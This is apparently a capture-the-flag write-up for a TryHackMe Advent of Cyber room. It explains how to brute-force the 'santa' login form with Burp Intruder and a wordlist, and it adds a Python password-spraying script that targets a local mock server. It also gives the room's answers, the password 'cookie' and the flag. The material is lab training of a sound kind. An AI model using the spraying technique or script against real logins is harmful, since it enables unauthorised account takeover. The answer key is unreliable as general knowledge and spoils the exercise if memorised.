1. Access the login form at http://MACHINE_IP
ANS: No answer needed
2. Configure Burp Suite and Firefox, submit some dummy credentials and intercept the request. Use Intruder to attack the login form.
ANS: No answer needed
3. What valid password can you use to access the “santa” account?
ANS: cookie
EXPLANATION:
Step 1: Open the login form at http://MACHINE_IP (for example http://10.10.230.8) in the browser. We already know the username is santa, so enter santa as the username and a placeholder value such as test as the password, then submit the form.
Step 2: Intercept the request in Burp Proxy and send it to Intruder (Ctrl+I). Click Clear § to drop the automatically selected positions, highlight the value test in the password parameter and click Add § so that it is the only payload position. Leave the username fixed as santa.
Step 3: Download the wordlist from https://assets.tryhackme.com/additional/aoc2021/day4/passwords.txt and save it to a file.
Step 4: In the Payloads tab, under Payload Options, click Load and select the saved file (payload type Simple list). Click Start Attack. In Burp Community Edition the attack is rate-limited, so it takes a few minutes.
Step 5: Sort the results by Status or Length. Every wrong password produces the same response (the login page again, HTTP 200 with an identical length), so the valid password is the single row that stands out: cookie returns HTTP status 302 (the redirect issued after a successful login) with a length of 2548.
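The same attack can be scripted instead of run through Intruder. The block below is an added example, not part of this walkthrough or of the TryHackMe room: it stands up a constructed stand-in for the login form on localhost, sends each password from a constructed mini wordlist with the username fixed to santa, and flags the response that deviates from the baseline, which is exactly the Status/Length check done by eye in Step 5. The form path /login, the field names username and password, and the 302-on-success behaviour are assumptions; the real wordlist would be loaded from passwords.txt.

```python
import http.client
import threading
import urllib.parse
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the room's login form. Assumptions: the real form
# posts "username" and "password" to /login and answers a valid login with a
# 302 redirect, which is what the Intruder results suggest.
VALID_USER = "santa"
VALID_PASS = "cookie"

# Constructed mini wordlist; the real attack loads passwords.txt from the room.
WORDLIST = ["password", "123456", "santa", "letmein", "cookie", "qwerty"]


class FakeLogin(BaseHTTPRequestHandler):
    """Answers every bad login with the same 200 page and a good one with a 302."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = fields.get("username", [""])[0]
        password = fields.get("password", [""])[0]
        if user == VALID_USER and password == VALID_PASS:
            self.send_response(302)
            self.send_header("Location", "/itinerary")
            self.end_headers()
        else:
            body = b"<html><body><form>Invalid username or password</form></body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the console output clean
        pass


def start_server():
    """Bind the fake login form to a free localhost port and serve it in the background."""
    server = HTTPServer(("127.0.0.1", 0), FakeLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(host, port, username, password):
    """POST one credential pair and return (status, body length), i.e. one Intruder row.
    http.client does not follow redirects, so a 302 is reported as-is."""
    body = urllib.parse.urlencode({"username": username, "password": password})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", "/login", body,
                 {"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    size = len(resp.read())
    conn.close()
    return resp.status, size


def spray_passwords(host, port, username, wordlist):
    """Try every password and return (hits, rows).

    rows mirrors Intruder's results table: (payload, status, length) per attempt.
    The baseline is the (status, length) pair shared by most attempts, i.e. the
    "wrong password" page; any row that deviates from it is a hit.
    """
    rows = [(pw, *try_login(host, port, username, pw)) for pw in wordlist]
    baseline = Counter((status, size) for _, status, size in rows).most_common(1)[0][0]
    hits = [pw for pw, status, size in rows if (status, size) != baseline]
    return hits, rows


if __name__ == "__main__":
    server = start_server()
    hits, rows = spray_passwords("127.0.0.1", server.server_address[1], "santa", WORDLIST)
    for pw, status, size in rows:
        print(f"{pw:<12} status={status} length={size}")
    print("candidate password(s):", hits)
    server.shutdown()
```

Picking the outlier against a majority baseline rather than hard-coding "302 means success" is the more robust check: some applications answer a valid login with a 200 of a different length, or a bad login with its own redirect, and the deviation is still visible either way.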
4. What is the flag in Santa’s itinerary?
ANS: THM{SANTA_DELIVERS}
EXPLANATION:
Step 1: Log in with username santa and password cookie; the itinerary page that loads after the redirect contains the flag.